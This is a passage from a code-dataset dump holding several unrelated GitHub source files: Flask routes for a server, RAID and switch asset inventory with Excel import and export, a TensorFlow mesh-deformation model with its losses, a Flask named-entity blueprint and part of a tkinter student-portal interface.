serverposition\n servermodel.MAC = serverform.mac.data\n servermodel.OWNER = serverform.owner.data\n servermodel.STATUS = serverform.status.data\n servermodel.UPTIME = serverform.uptime.data\n servermodel.AssertNum = serverform.assertnum.data\n db.session.commit()\n main_logger.info('%s 修改服务器成功: %s', 'manager', serverform.ip.data)\n servermodels = ServerModel.query.all()\n return redirect(url_for('main.server', servermodels=servermodels))\n return render_template('modifyserver.html', form=serverform)\n\n\n@main.route('/server/deleteserver', methods=['GET', 'POST'])\ndef deleteServer():\n serverid = request.args.get('id', '')\n servermodel = ServerModel.query.filter_by(ID=serverid).first()\n ip = servermodel.IP\n db.session.delete(servermodel)\n db.session.commit()\n main_logger.info('%s 删除服务器成功: %s', 'manager', ip)\n servermodels = ServerModel.query.all()\n return render_template('server.html', servermodels=servermodels)\n\n\n@main.route('/raid/add', methods=['GET', 'POST'])\ndef addRaid():\n raidform = RaidForm()\n print(\"submit\")\n print(raidform.validate_on_submit())\n print(raidform.data)\n if raidform.validate_on_submit():\n flash('已提交')\n if not re.match('[0-9]{2,3}', raidform.position4.data):\n flash('房间号格式不正确')\n else:\n if RaidModel.query.filter_by(IP=raidform.ip.data).first():\n flash('IP地址冲突')\n else:\n if raidform.assertnum.data and RaidModel.query.filter_by(AssertNum=raidform.assertnum.data).first():\n flash('资产编号冲突')\n else:\n position = raidform.position1.data + '-' + raidform.position2.data + '-' + \\\n raidform.position3.data + '-' + raidform.position4.data\n print('not a')\n a = get_ks3200_info(raidform.ip.data, position, raidform.owner.data, raidform.model.data, raidform.assertnum.data)\n print('a')\n print(a)\n if not a:\n raidmodel = RaidModel(MODEL=raidform.model.data, POSITION=position,\n OWNER=raidform.owner.data, AssertNum=raidform.assertnum.data,\n IP=raidform.ip.data, UPTIME='', STATUS='OFF', USEDPERCENT='')\n db.session.add(raidmodel)\n db.session.commit()\n main_logger.info('%s 添加磁阵成功: %s', 'manager', raidform.ip.data)\n raidmodels = ServerModel.query.all()\n return redirect(url_for('main.raid', raidmodels=raidmodels))\n return render_template('addraid.html', form=raidform)\n\n\n@main.route('/raid/modify', methods=['GET', 'POST'])\ndef modifyRaid():\n raidid = request.args.get('id', '')\n raidmodel = RaidModel.query.filter_by(ID=raidid).first()\n position = raidmodel.POSITION.split('-')\n form = RaidForm(model=raidmodel.MODEL, ip=raidmodel.IP,\n uptime=raidmodel.UPTIME, owner=raidmodel.OWNER,\n status=raidmodel.STATUS, usedpercent=raidmodel.USEDPERCENT,\n assertnum=raidmodel.AssertNum, position1=position[0],\n position2=position[1], position3=position[2], position4=position[3])\n if form.validate_on_submit():\n flash('已提交')\n if not re.match('[0-9]{2,3}', form.position4.data):\n flash('房间号格式不正确')\n else:\n if form.ip.data != raidmodel.IP and ServerModel.query.filter_by(IP=form.ip.data).first():\n flash('IP地址冲突')\n else:\n if form.assertnum.data != raidmodel.AssertNum and \\\n ServerModel.query.filter_by(AssertNum=form.assertnum.data).first():\n flash('资产编号冲突')\n else:\n serverposition = form.position1.data + '-' + form.position2.data + '-' + \\\n form.position3.data + '-' + form.position4.data\n raidmodel.MODEL = form.model.data\n raidmodel.IP = form.ip.data\n raidmodel.POSITION = serverposition\n raidmodel.UPTIME = form.uptime.data\n raidmodel.OWNER = form.owner.data\n raidmodel.STATUS = form.status.data\n raidmodel.USEDPERCENT = form.usedpercent.data\n 
raidmodel.AssertNum = form.assertnum.data\n db.session.commit()\n main_logger.info('%s 修改磁阵成功: %s', 'manager', form.ip.data)\n raidmodels = RaidModel.query.all()\n return redirect(url_for('main.raid', raidmodels=raidmodels))\n return render_template('modifyraid.html', form=form)\n\n\n@main.route('/server/deleteraid', methods=['GET', 'POST'])\ndef deleteRaid():\n raidid = request.args.get('id', '')\n raidmodel = RaidModel.query.filter_by(ID=raidid).first()\n ip = raidmodel.IP\n db.session.delete(raidmodel)\n db.session.commit()\n main_logger.info('%s 删除磁阵成功: %s', 'manager', ip)\n raidmodels = RaidModel.query.all()\n return render_template('raid.html', raidmodels=raidmodels)\n\n\n@main.route('/switch/add', methods=['GET', 'POST'])\ndef addSwitch():\n switchform = SwitchForm()\n print(\"submit\")\n print(switchform.validate_on_submit())\n print(switchform)\n if switchform.validate_on_submit():\n flash('已提交')\n if not re.match('[0-9]{2,3}', switchform.position4.data):\n flash('房间号格式不正确')\n else:\n if SwitchModel.query.filter_by(IP=switchform.ip.data).first():\n flash('IP地址冲突')\n else:\n if switchform.assertnum.data and SwitchModel.query.filter_by(AssertNum=switchform.assertnum.data).first():\n flash('资产编号冲突')\n else:\n position = switchform.position1.data + '-' + switchform.position2.data + '-' + \\\n switchform.position3.data + '-' + switchform.position4.data\n print('not a')\n a = get_switch_info(switchform.ip.data, position, switchform.owner.data, switchform.model.data, switchform.assertnum.data)\n print('a')\n print(a)\n if not a:\n switchmodel = SwitchModel(MODEL=switchform.model.data, POSITION=position,\n OWNER=switchform.owner.data, AssertNum=switchform.assertnum.data,\n IP=switchform.ip.data, UPTIME='', STATUS='OFF', IFNUMBER='')\n db.session.add(switchmodel)\n db.session.commit()\n main_logger.info('%s 添加交换机成功: %s', 'manager', switchform.ip.data)\n switchmodels = SwitchModel.query.all()\n return redirect(url_for('main.switch', switichmodels=switchmodels))\n return render_template('addswitch.html', form=switchform)\n\n\n@main.route('/switch/modify', methods=['GET', 'POST'])\ndef modifySwitch():\n switchid = request.args.get('id', '')\n switchmodel = SwitchModel.query.filter_by(ID=switchid).first()\n position = switchmodel.POSITION.split('-')\n form = SwitchForm(model=switchmodel.MODEL, ip=switchmodel.IP,\n uptime=switchmodel.UPTIME, owner=switchmodel.OWNER,\n status=switchmodel.STATUS, ifnumber=switchmodel.IFNUMBER,\n assertnum=switchmodel.AssertNum, position1=position[0],\n position2=position[1], position3=position[2], position4=position[3])\n if form.validate_on_submit():\n flash('已提交')\n if not re.match('[0-9]{2,3}', form.position4.data):\n flash('房间号格式不正确')\n else:\n if form.ip.data != switchmodel.IP and ServerModel.query.filter_by(IP=form.ip.data).first():\n flash('IP地址冲突')\n else:\n if form.assertnum.data != switchmodel.AssertNum and \\\n ServerModel.query.filter_by(AssertNum=form.assertnum.data).first():\n flash('资产编号冲突')\n else:\n serverposition = form.position1.data + '-' + form.position2.data + '-' + \\\n form.position3.data + '-' + form.position4.data\n switchmodel.MODEL = form.model.data\n switchmodel.IP = form.ip.data\n switchmodel.POSITION = serverposition\n switchmodel.UPTIME = form.uptime.data\n switchmodel.OWNER = form.owner.data\n switchmodel.STATUS = form.status.data\n switchmodel.IFNUMBER = form.ifnumber.data\n switchmodel.AssertNum = form.assertnum.data\n db.session.commit()\n main_logger.info('%s 修改交换机成功: %s', 'manager', form.ip.data)\n switchmodels = 
SwitchModel.query.all()\n return redirect(url_for('main.switch', switchmodels=switchmodels))\n return render_template('modifyswitch.html', form=form)\n\n\n@main.route('/switch/deleteswitch', methods=['GET', 'POST'])\ndef deleteSwitch():\n switchid = request.args.get('id', '')\n switchmodel = SwitchModel.query.filter_by(ID=switchid).first()\n ip = switchmodel.IP\n db.session.delete(switchmodel)\n db.session.commit()\n main_logger.info('%s 删除交换机成功: %s', 'manager', ip)\n switchmodels = SwitchModel.query.all()\n return render_template('switch.html', switchmodels=switchmodels)\n\n@main.route('/server/batchadd', methods=['GET', 'POST'])\ndef batchadd():\n return render_template('server1.html')\n \ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1] in set(['xlsx'])\n\n@main.route('/server/upload', methods=['GET', 'POST'])\ndef upload():\n #print(\"de\")\n #print(\"de\")\n print(request.files)\n file = request.files.get('file')\n print(file)\n #print(\"de1\")\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n #print(\"de2\")\n print(filename)\n file_path = '/opt/'\n file.save(os.path.join(file_path, filename))\n #print(\"de3\")\n work_file = file_path + filename\n print(work_file)\n ExcelFile = xlrd.open_workbook(work_file)\n print(\"start batch insert\\n\") \n table = ExcelFile.sheets()[0]\n \n #get rows number\n nrows = table.nrows \n #print(nrows) \n #get cols number\n ncols = table.ncols \n data_list = []\n \n #start row from index 2, first row is the title\n for col in range(ncols):\n row_values = table.col_values(col, 1, nrows)\n data_list.append(row_values)\n print(data_list)\n try:\n for row in range(nrows-1):\n print(\"aaa\")\n servermodel = ServerModel(MODEL=data_list[0][row], POSITION=data_list[2][row],\n OWNER=data_list[5][row], AssertNum=data_list[1][row],\n IP=data_list[4][row], MAC=data_list[3][row],\n STATUS=data_list[6][row], UPTIME=data_list[7][row])\n print(\" WWJ\")\n db.session.add(servermodel)\n db.session.commit()\n print(\"\\ninsert sucessful\\n\")\n except Exception: \n print(\"DB insert Exception\")\n print(Exception)\n else:\n print(\"qingshuru1\")\n #tkinter.messagebox.showerror(\"提示\",\"请选择excel文件\")\n print(\"aaa\")\n servermodels = ServerModel.query.all()\n return redirect(url_for('main.server', servermodels=servermodels))\n #pass\n # pass\n\n\n@main.route('/server/download', methods=['GET', 'POST'])\ndef Serverdownload():\n file_export_path = \"\"\n workbook = xlwt.Workbook(encoding = \"UTF-8\")\n servermodels_list = ServerModel.query.all()\n read_data_list = servermodels_list\n #print(\"de\")\n for i in read_data_list:\n print(\"de\"+i.MAC+\"de\")\n sheet = workbook.add_sheet('Asset Server information table')\n #insert the db_head to the generated excel\n head_list = [u\"型号\",u\"资产编号\",u\"位置\",\\\n u\"MAC\",u\"IP\",u\"持有人\", u\"上电状态\",u\"上电时间\"]\n col_head_insert_index = 0\n print(\"de1\")\n for element in head_list:\n print(\"de2\")\n sheet.write(0, col_head_insert_index, element)\n col_head_insert_index += 1\n #insert DB_data to generated excel\n row_insert_index = 1\n col_insert_index = 0\n for list in read_data_list:\n list_temp = [list.MODEL, list.AssertNum,\\\n list.POSITION, list.MAC, list.IP,\\\n list.OWNER, list.STATUS, list.UPTIME]\n print(list_temp)\n for element in list_temp:\n #print(\"de22\")\n #print(\"a\"+element+\"b\") \n sheet.write(row_insert_index, col_insert_index, element)\n col_insert_index += 1\n row_insert_index += 1\n col_insert_index = 0\n #list_temp = [] \n 
#print(row_insert_index)\n #print(\"de33\")\n workbook.save(file_export_path.join([\"Asset_server_information\", \".xlsx\"]))\n print(\"export sucessful\")\n filename = \"Asset_server_information.xlsx\"\n directory = \"/home/RMS_11/Asset_Management-code/cmdb-zte-1/\"\n response = send_from_directory(directory, filename, as_attachment=True)\n return response\n #pass\n@main.route('/raid/download', methods=['GET', 'POST'])\ndef Raiddownload():\n file_export_path = \"\"\n workbook = xlwt.Workbook(encoding = \"UTF-8\")\n servermodels_list = RaidModel.query.all()\n read_data_list = servermodels_list\n #print(\"de\")\n sheet = workbook.add_sheet('Asset Raid information table')\n #insert the db_head to the generated excel\n head_list = [u\"型号\",u\"位置\",u\"持有人\",\\\n u\"资产编号\",u\"IP\",\"上电时间\", u\"上电状态\",u\"使用率\"]\n col_head_insert_index = 0\n print(read_data_list[0].MODEL)\n print(read_data_list[0].POSITION)\n print(read_data_list[0].AssertNum)\n print(read_data_list[0].IP)\n print(read_data_list[0].STATUS)\n print(read_data_list[0].USEDPERCENT)\n print(read_data_list[0].OWNER)\n print(read_data_list[0].UPTIME)\n for element in head_list:\n print(\"de2\")\n sheet.write(0, col_head_insert_index, element)\n col_head_insert_index += 1\n #insert DB_data to generated excel\n row_insert_index = 1\n col_insert_index = 0\n for list in read_data_list:\n print(\"de3\")\n list_temp = [list.MODEL, list.POSITION,\\\n list.OWNER, list.AssertNum, list.IP,\\\n list.UPTIME, list.STATUS, list.USEDPERCENT]\n print(list_temp)\n for element in list_temp:\n #print(\"de22\")\n #print(\"a\"+element+\"b\") \n sheet.write(row_insert_index, col_insert_index, element)\n col_insert_index += 1\n row_insert_index += 1\n col_insert_index = 0\n #list_temp = [] \n #print(row_insert_index)\n #print(\"de33\")\n workbook.save(file_export_path.join([\"Asset_raid_information\", \".xlsx\"]))\n print(\"export sucessful\")\n filename = \"Asset_raid_information.xlsx\"\n directory = \"/home/RMS_11/Asset_Management-code/cmdb-zte-1/\"\n response = send_from_directory(directory, filename, as_attachment=True)\n return response\n #pass\n\n@main.route('/switch/download', methods=['GET', 'POST'])\ndef Switchdownload():\n file_export_path = \"\"\n workbook = xlwt.Workbook(encoding = \"UTF-8\")\n servermodels_list = SwitchModel.query.all()\n read_data_list = servermodels_list\n #print(\"de\")\n sheet = workbook.add_sheet('Asset Switch information table')\n #insert the db_head to the generated excel\n head_list = [u\"型号\",u\"位置\",u\"持有人\",\\\n u\"资产编号\",u\"IP\",u\"上电时间\", u\"上电状态\",u\"网络接口数量\"]\n col_head_insert_index = 0\n print(read_data_list)\n for element in head_list:\n print(\"de2\")\n sheet.write(0, col_head_insert_index, element)\n col_head_insert_index += 1\n #insert DB_data to generated excel\n row_insert_index = 1\n col_insert_index = 0\n for list in read_data_list:\n list_temp = [list.MODEL, list.POSITION,\\\n list.OWNER, list.AssertNum, list.IP,\\\n list.UPTIME, list.STATUS, list.IFNUMBER]\n print(list_temp)\n for element in list_temp:\n #print(\"de22\")\n #print(\"a\"+element+\"b\") \n sheet.write(row_insert_index, col_insert_index, element)\n col_insert_index += 1\n row_insert_index += 1\n col_insert_index = 0\n #list_temp = [] \n #print(row_insert_index)\n #print(\"de33\")\n workbook.save(file_export_path.join([\"Asset_switch_information\", \".xlsx\"]))\n print(\"export sucessful\")\n filename = \"Asset_switch_information.xlsx\"\n directory = \"/home/RMS_11/Asset_Management-code/cmdb-zte-1/\"\n response = 
send_from_directory(directory, filename, as_attachment=True)\n return response\n #pass\n\n\n@main.route('/update', methods=['GET', 'POST'])\ndef update():\n update_server_DB()\n update_storage_DB()\n update_switch_DB()\n servermodels = ServerModel.query.all()\n return redirect(url_for('main.server', servermodels=servermodels))\n\n","repo_name":"wanweijian/RMS_12","sub_path":"RMS-System/Asset_Management-code/cmdb-zte-1/app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":25958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6992575464","text":"import tensorflow as tf\nimport numpy as np\nimport math\nimport os\nfrom tensorflow.contrib.slim.python.slim.nets import vgg\nfrom tensorflow.contrib import layers\nimport sys\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nROOT_DIR = os.path.dirname(BASE_DIR)\nsys.path.append(os.path.join(ROOT_DIR))\nsys.path.append(os.path.join(ROOT_DIR, 'models'))\nimport models.pointnet.model as pointnet\nimport losses\nimport meshnet\nimport deformnet\n\ndef mesh_placeholder_inputs(batch_size, maxnverts, maxntris, img_size=(600,600), scope=''):\n\n with tf.variable_scope(scope) as sc:\n verts_pl = tf.placeholder(tf.float32, shape=(batch_size, maxnverts, 3))\n nverts_pl = tf.placeholder(tf.int32, shape=(batch_size, 1))\n tris_pl = tf.placeholder(tf.int32, shape=(batch_size, maxntris, 3))\n ntris_pl = tf.placeholder(tf.int32, shape=(batch_size, 1))\n imgs_pl = tf.placeholder(tf.float32, shape=(batch_size, img_size[0], img_size[1], 3))\n\n mesh = {}\n mesh['verts'] = verts_pl\n mesh['nverts'] = nverts_pl\n mesh['tris'] = tris_pl\n mesh['ntris'] = ntris_pl\n mesh['imgs'] = imgs_pl\n\n return mesh\n\ndef get_model(src_mesh, ref_mesh, num_point, is_training, bn=False, bn_decay=None, img_size = 224, localloss=True):\n\n src_verts = src_mesh['verts']\n src_nverts = src_mesh['nverts']\n src_tris = src_mesh['tris']\n src_ntris = src_mesh['ntris']\n\n ref_verts = ref_mesh['verts']\n ref_nverts = ref_mesh['nverts']\n ref_tris = ref_mesh['tris']\n ref_ntris = ref_mesh['ntris']\n ref_img = ref_mesh['imgs']\n\n batch_size = src_verts.get_shape()[0].value\n num_src_verts = src_verts.get_shape()[1].value\n\n end_points = {}\n end_points['src_mesh'] = src_mesh\n end_points['ref_mesh'] = ref_mesh\n\n # source\n src_pc, _, correpondingface,_,_,_ = meshnet.mesh_sample(src_verts, src_nverts, src_tris, src_ntris, batch_size, num_point, src_verts, scope='meshsample') \n end_points['src_pc'] = src_pc\n _, src_feats = pointnet.get_model(src_pc, is_training, num_point=num_point, scope='srcpc', bn=bn, bn_decay=bn_decay)\n end_points['src_feats'] = src_feats['embedding']\n\n ref_pc, _, correpondingface,_,_,_ = meshnet.mesh_sample(ref_verts, ref_nverts, ref_tris, ref_ntris, batch_size, num_point, ref_verts, scope='meshsample') \n end_points['ref_pc'] = ref_pc\n\n # CNN extract features\n if ref_img.shape[1] != img_size or ref_img.shape[2] != img_size:\n ref_img = tf.image.resize_bilinear(ref_img, [img_size, img_size])\n end_points['ref_img'] = ref_img\n\n vgg.vgg_16.default_image_size = img_size\n ref_feats_embedding, vgg_end_points = vgg.vgg_16(ref_img, num_classes=1024, is_training=False, scope='vgg_16', spatial_squeeze=False)\n\n ref_feats_embedding_cnn = tf.squeeze(ref_feats_embedding, axis = [1,2]) \n end_points['ref_feats_embedding_cnn'] = ref_feats_embedding_cnn\n\n with tf.variable_scope(\"refpc_reconstruction\") as scope: \n reconst_pc = pointnet.get_decoder(ref_feats_embedding_cnn, 
is_training)\n end_points['reconst_pc'] = reconst_pc\n\n with tf.variable_scope(\"sharebiasnet\") as scope: \n pred_pc, centroids = deformnet.get_pred_foldenet_basic(src_pc, src_feats['embedding'], ref_feats_embedding_cnn, is_training, batch_size, num_point, bn, bn_decay)\n end_points['pred_pc'] = pred_pc\n\n scope.reuse_variables() \n pred_verts, _ = deformnet.get_pred_foldenet_basic(src_verts, src_feats['embedding'], ref_feats_embedding_cnn, is_training, batch_size, num_point, bn, bn_decay) \n end_points['pred_verts'] = pred_verts\n\n if localloss:\n delta = 0.005\n localpclap_pred_pc = [pred_pc]\n localpclap_src_pc = [src_pc]\n\n src_pc_x = src_pc[:,:,0]\n src_pc_y = src_pc[:,:,1]\n src_pc_z = src_pc[:,:,2]\n\n src_pc_x1 = src_pc_x + delta\n src_pc_x1 = tf.concat(axis=2, values=[tf.expand_dims(src_pc_x1, -1), src_pc[:,:,1:]])\n src_pc_x2 = src_pc_x - delta\n src_pc_x2 = tf.concat(axis=2, values=[tf.expand_dims(src_pc_x2, -1), src_pc[:,:,1:]])\n\n src_pc_y1 = src_pc_y + delta\n src_pc_y1 = tf.concat(axis=2, values=[tf.expand_dims(src_pc[:,:,0], -1), tf.expand_dims(src_pc_y1, -1), tf.expand_dims(src_pc[:,:,2], -1)])\n src_pc_y2 = src_pc_y - delta\n src_pc_y2 = tf.concat(axis=2, values=[tf.expand_dims(src_pc[:,:,0], -1), tf.expand_dims(src_pc_y2, -1), tf.expand_dims(src_pc[:,:,2], -1)])\n\n src_pc_z1 = src_pc_z + delta\n src_pc_z1 = tf.concat(axis=2, values=[src_pc[:,:,:2], tf.expand_dims(src_pc_z1, -1)])\n src_pc_z2 = src_pc_z - delta\n src_pc_z2 = tf.concat(axis=2, values=[src_pc[:,:,:2], tf.expand_dims(src_pc_z2, -1)])\n\n localpclap_src_pc += [[src_pc_x1, src_pc_x2],\n [src_pc_y1, src_pc_y2], \n [src_pc_z1, src_pc_z2]] \n end_points['localpclap_src_pc'] = localpclap_src_pc \n\n pred_pc_x1, _ = deformnet.get_pred_foldenet_basic(src_pc_x1, src_feats['embedding'], ref_feats_embedding_cnn, is_training, batch_size, num_point, bn, bn_decay)\n pred_pc_x2, _ = deformnet.get_pred_foldenet_basic(src_pc_x2, src_feats['embedding'], ref_feats_embedding_cnn, is_training, batch_size, num_point, bn, bn_decay)\n\n pred_pc_y1, _ = deformnet.get_pred_foldenet_basic(src_pc_y1, src_feats['embedding'], ref_feats_embedding_cnn, is_training, batch_size, num_point, bn, bn_decay)\n pred_pc_y2, _ = deformnet.get_pred_foldenet_basic(src_pc_y2, src_feats['embedding'], ref_feats_embedding_cnn, is_training, batch_size, num_point, bn, bn_decay)\n\n pred_pc_z1, _ = deformnet.get_pred_foldenet_basic(src_pc_z1, src_feats['embedding'], ref_feats_embedding_cnn, is_training, batch_size, num_point, bn, bn_decay)\n pred_pc_z2, _ = deformnet.get_pred_foldenet_basic(src_pc_z2, src_feats['embedding'], ref_feats_embedding_cnn, is_training, batch_size, num_point, bn, bn_decay)\n\n localpclap_pred_pc += [[pred_pc_x1, pred_pc_x2],\n [pred_pc_y1, pred_pc_y2], \n [pred_pc_z1, pred_pc_z2]]\n end_points['localpclap_pred_pc'] = localpclap_pred_pc\n\n return end_points\n\n\n\ndef get_loss(end_points, num_class=4):\n \"\"\"\n pred: BxNx3,\n label: BxNx3,\n \"\"\"\n\n end_points['losses'] = {}\n pred_pc = end_points['pred_pc']\n ref_pc = end_points['ref_pc']\n\n ## point cloud loss\n pred_pc = end_points['pred_pc']\n ref_pc = end_points['ref_pc']\n pc_cf_loss, end_points = losses.get_chamfer_loss(pred_pc, ref_pc, end_points)\n pc_cf_loss = 10000 * pc_cf_loss\n \n pc_em_loss, end_points = losses.get_em_loss(pred_pc, ref_pc, end_points)\n end_points['losses']['pc_cf_loss'] = pc_cf_loss\n end_points['losses']['pc_em_loss'] = pc_em_loss\n\n ## mesh loss\n pred_verts = end_points['pred_verts']\n src_mesh = end_points['src_mesh']\n src_verts = 
src_mesh['verts']\n src_nverts = src_mesh['nverts']\n src_tris = src_mesh['tris']\n src_ntris = src_mesh['ntris']\n batch_size = src_verts.get_shape()[0].value\n num_point = ref_pc.get_shape()[1].value\n _, pred_pc_fromverts, correpondingface, _, _, _ = meshnet.mesh_sample(src_verts, src_nverts, src_tris, src_ntris, batch_size, num_point, src_verts, scope='meshsample') \n pred_pc_fromverts = tf.squeeze(pred_pc_fromverts, axis=2)\n mesh_cf_loss, end_points = losses.get_chamfer_loss(pred_pc_fromverts, ref_pc, end_points)\n mesh_cf_loss = 1000 * mesh_cf_loss\n \n mesh_em_loss, end_points = losses.get_em_loss(pred_pc_fromverts, ref_pc, end_points)\n end_points['losses']['mesh_cf_loss'] = mesh_cf_loss\n end_points['losses']['mesh_em_loss'] = mesh_em_loss\n\n ## symmetry loss\n pred_pc_xflip = tf.concat([tf.expand_dims(-pred_pc[:,:,0], axis=2), tf.expand_dims(pred_pc[:,:,1], axis=2), tf.expand_dims(pred_pc[:,:,2], axis=2)], axis = 2)\n pc_symmetry_loss, end_points = losses.get_chamfer_loss(pred_pc_xflip, ref_pc, end_points)\n pc_symmetry_loss = 1000 * pc_symmetry_loss\n match_symmetry_loss, end_points = losses.get_em_loss(pred_pc_xflip, ref_pc, end_points)\n end_points['losses']['pc_symmetry_loss'] = pc_symmetry_loss\n end_points['losses']['match_symmetry_loss'] = match_symmetry_loss\n\n # local permutation invariance loss\n localpclap_pred_pc = end_points['localpclap_pred_pc']\n pc_local_laplacian_loss, end_points = losses.get_pc_local_laplacian_loss(localpclap_pred_pc, end_points=end_points)\n pc_local_laplacian_loss = 1000 * pc_local_laplacian_loss\n end_points['losses']['pc_local_laplacian_loss'] = pc_local_laplacian_loss\n\n ## mesh laplacian loss\n mesh_laplacian_loss, _ = losses.get_laplacian_loss(src_mesh, pred_verts)\n mesh_laplacian_loss = 0.01 * mesh_laplacian_loss\n end_points['losses']['mesh_laplacian_loss'] = mesh_laplacian_loss\n\n # reconstruction loss\n reconst_pc = end_points['reconst_pc']\n recon_cf_loss, end_points = losses.get_chamfer_loss(reconst_pc, ref_pc, end_points)\n recon_cf_loss = 1000 * recon_cf_loss\n recon_em_loss, end_points = losses.get_em_loss(reconst_pc, ref_pc, end_points)\n end_points['losses']['recon_cf_loss'] = recon_cf_loss\n end_points['losses']['recon_em_loss'] = recon_em_loss\n\n loss = pc_cf_loss + pc_em_loss + \\\n mesh_cf_loss + mesh_em_loss + \\\n pc_symmetry_loss + match_symmetry_loss + \\\n recon_cf_loss + recon_em_loss + \\\n pc_local_laplacian_loss + \\\n mesh_laplacian_loss \n\n end_points['losses']['overall_loss'] = loss\n tf.add_to_collection('losses', loss)\n\n for lossname in end_points['losses'].keys():\n tf.summary.scalar(lossname, end_points['losses'][lossname])\n\n return loss, end_points\n","repo_name":"laughtervv/3DN","sub_path":"shapenet/2D/model_vgg.py","file_name":"model_vgg.py","file_ext":"py","file_size_in_byte":9851,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"48"} +{"seq_id":"70945396945","text":"import sys, os\nsys.path.insert(1, os.path.join(sys.path[0], '..'))\nfrom file import File\n\nf = File(\"content.fx\")\nf.expressions = {\n \"5\": [(0,0),(1,0), (2,0)],\n \"4\": [(3,0),(4,0), (3,1),(4,1)]\n}\nprint([[\"Range \" + str((l.rows, l.cols)) for l in items] for items in f.compact().values()])","repo_name":"jhoobergs/FRuTeX","sub_path":"fx-backend/src/tests/file_test.py","file_name":"file_test.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13861858993","text":"from 
flask import *\nimport codecs,json,sys,os\nfrom Named import name\nfrom Named import get_name\nfrom flask_cors import CORS\n\nnamed = Blueprint('named', __name__)\ncors = CORS(named, resources={r\"/named/sentdata\": {\"origins\": \"*\"}})\ncors = CORS(named, resources={r\"/named/getdata\": {\"origins\": \"*\"}})\n\n@named.route('/sentdata',methods=['GET','POST']) ## receive data from the frontend\ndef sentdata():\n    data = request.get_data()\n    json_re = json.loads(data)\n    print(json_re[\"text\"])\n    name.whole(json_re[\"text\"])\n    return '完成'\n\n@named.route('/getdata',methods=['GET','POST']) ## send data from the backend to the frontend\ndef getdata():\n    data = json.dumps(get_name.sett(), ensure_ascii=False)\n    return data\n","repo_name":"Fly97/text","sub_path":"venv/Include/Named/flask_named.py","file_name":"flask_named.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"39877174561","text":"import tkinter.messagebox\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nfrom tkinter import messagebox\r\nfrom tkinter import scrolledtext\r\nfrom customtkinter import *\r\nfrom PIL import Image,ImageTk\r\nimport socket\r\nimport threading\r\n\r\n\r\n\r\n\r\n\r\nclass FisrtPage(Frame):\r\n def __init__(self, parent, controller):\r\n Frame.__init__(self,parent,bg=\"#333\")\r\n box = Frame(self,bg=\"#333\")\r\n\r\n label1 = Label(box, text=\"scs\", bg=\"#333\", fg=\"#fff\", font=(\"arial\", 30)).grid(row=0, column=0, columnspan=2,pady=40)\r\n\r\n admlabel = Label(box, text=\"ADM NO:\", bg=\"#333\", fg=\"#fff\", font=(\"arial\", 16)).grid(row=1, column=0)\r\n admEntry = Entry(box, font=(\"arial\", 16))\r\n admEntry.grid(row=1, column=1, pady=10)\r\n\r\n passwordlabel = Label(box, text=\"password:\", bg=\"#333\", fg=\"#fff\", font=(\"arial\", 16)).grid(row=2, column=0)\r\n passwordEntry = Entry(box, show=\".\", font=(\"arial\", 16))\r\n passwordEntry.grid(row=2, column=1, pady=10)\r\n\r\n def verify():\r\n if admEntry.get() == \"milo\" and passwordEntry.get() == \"milo\":\r\n controller.show_frame(SecondPage)\r\n else:\r\n messagebox.showinfo(\"error\",\"wrong admno or password\")\r\n loginButton = CTkButton(box, text=\"login\", font=(\"arial\", 16),command= verify).grid(row=3, column=0, columnspan=2,pady=20)\r\n\r\n admin_button = CTkButton(self,text=\"admin\",font=(\"arial\",16),height=10,width=10,command=lambda :controller.show_frame(AdminPage)).place(x=700,y=10)\r\n\r\n box.pack()\r\n\r\n\r\nclass AdminPage(Frame):\r\n def __init__(self, parent, controller):\r\n Frame.__init__(self,parent,bg=\"#fff\")\r\n box = Frame(self,bg=\"#333\")\r\n\r\n\r\n\r\n\r\n\r\n box.pack()\r\n\r\n\r\nclass SecondPage(Frame):\r\n def __init__(self, parent, controller):\r\n Frame.__init__(self,parent,bg=\"#fff\")\r\n box = Frame(self,bg=\"#333\")\r\n infotab = Frame(self,bg=\"#fff\")\r\n notification_frame= Frame(self,bg=\"#333\",height=50,width=50)\r\n\r\n l1 = CTkLabel(self, text=\"Name:\", font=(\"arial\", 16))\r\n l2 = CTkLabel(self, text=\"ADM NO:\", font=(\"arial\", 16))\r\n l3 = CTkLabel(self, text=\"Course:\", font=(\"arial\", 16))\r\n l1.place(x=10,y=140)\r\n l2.place(x=10,y=170)\r\n l3.place(x=10,y=200)\r\n\r\n global img\r\n img = PhotoImage(file=\"pictures/user.png\")\r\n img_label = CTkLabel(self, image=img,text=\"\")\r\n img_label.place(x=10,y=10)\r\n\r\n\r\n\r\n imgg = ImageTk.PhotoImage(Image.open(\"pictures/email-message-icon-4.png\").resize((50,50)))\r\n b1 = CTkButton(master=self,image =imgg,text=\"\",height=5, 
width=5,fg_color=\"#fff\",hover_color=\"#fff\",command=lambda:controller.show_frame(ThirdPage)).place(x=640,y=3)\r\n\r\n imgg = ImageTk.PhotoImage(Image.open(\"pictures/menu.png\").resize((30, 30)))\r\n b1 = CTkButton(master=self, image=imgg, text=\"\", height=30, width=30,fg_color=\"#fff\",hover_color=\"#fff\",command=lambda: controller.show_frame(ThirdPage)).place(x=700, y=10)\r\n\r\n imgg = ImageTk.PhotoImage(Image.open(\"pictures/more-vertical-alt.png\").resize((30, 30)))\r\n b1 = CTkButton(master=self, image=imgg, text=\"\", height=30, width=30,fg_color=\"#fff\",hover_color=\"#fff\",command=lambda: controller.show_frame(ThirdPage)).place(x=740, y=10)\r\n\r\n #b1=Button(self,image=(img),height=30,width=30)\r\n #b1.place(x=600,y=30)\r\n\r\n Listbox(notification_frame, font=(\"arial\",16),height=13,width=40).pack()\r\n CTkButton(infotab, text=\"fee statement\",font=(\"arial\", 16)).pack()\r\n CTkButton(infotab, text=\"School schedule\", font=(\"arial\",16)).pack(pady=10)\r\n CTkButton(infotab, text=\"Exams\", 